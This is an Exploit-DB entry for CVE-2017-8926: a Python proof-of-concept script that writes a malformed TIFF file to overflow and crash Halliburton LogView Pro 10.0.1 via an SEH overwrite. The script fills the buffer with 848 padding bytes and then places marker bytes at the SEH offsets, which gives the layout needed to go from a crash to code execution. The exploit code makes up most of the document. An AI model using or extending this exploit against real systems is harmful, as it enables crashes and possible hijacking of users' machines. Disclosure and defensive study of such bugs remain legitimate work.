Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)

EDB-ID:

42001


Author:

Muhann4d

Type:

dos


Platform:

Windows

Date:

2017-05-14


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/python
# Exploit Title     : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)
# Date              : 2017-05-14
# Exploit Author    : Muhann4d
# CVE               : CVE-2017-8926
# Vendor Homepage   : http://www.halliburton.com
# Software Link     : http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe
# Affected Versions : 10.0.1   
# Category          : Denial of Service (DoS) Local
# Tested on OS      : Windows 7 Professional SP1 32bit
# Proof of Concept  : run the exploit, open the poc.tif file with the Halliburton LogView Pro 10.0.1

# Vendor has been cantacted but no reply.

buf = "\x41" * 848
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()